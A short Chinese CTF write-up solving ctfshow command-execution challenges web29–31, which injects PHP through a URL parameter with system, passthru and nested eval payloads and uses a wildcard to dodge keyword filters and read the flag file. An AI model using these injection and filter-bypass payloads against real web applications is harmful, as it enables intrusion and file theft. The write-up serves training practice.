ctfshow_Web入门_命令执行（更新中...）

web29

 

 审题：已知c为可控变量，且过滤了字符串flag的大小写

 解题：1、使用正则表达式将flag替换成fla*

　　　 2、在url中输入  ?c=system("cat fla*");

　　　 3、出现空白页，右击审查源代码获取flag

　　　 4、成功过关！

 

web30

 

  审题：已知c为可控变量，且过滤了字符串flag、system、php的大小写

  解题：1、使用正则表达式将flag替换成fla*

　　　  2、使用pssthru替换system，在url中输入  ?c=passthru("cat fla*");

             3、出现空白页，右击审查源代码获取flag

　　　  4、成功过关！

 

web31

 

 审题：已知c为可控变量，且过滤了字符串flag、system、php、cat、sort、shell的大小写以及符号.'空格

 解题：1、使用eval创建一个get参数a，随后让a引用代码，如下

　　　 2、url中输入  ?c=eval($_GET[a]);&a=system("cat flag.php");

　　　 3、出现空白页，右击审查源代码获取flag

　　     4、成功过关！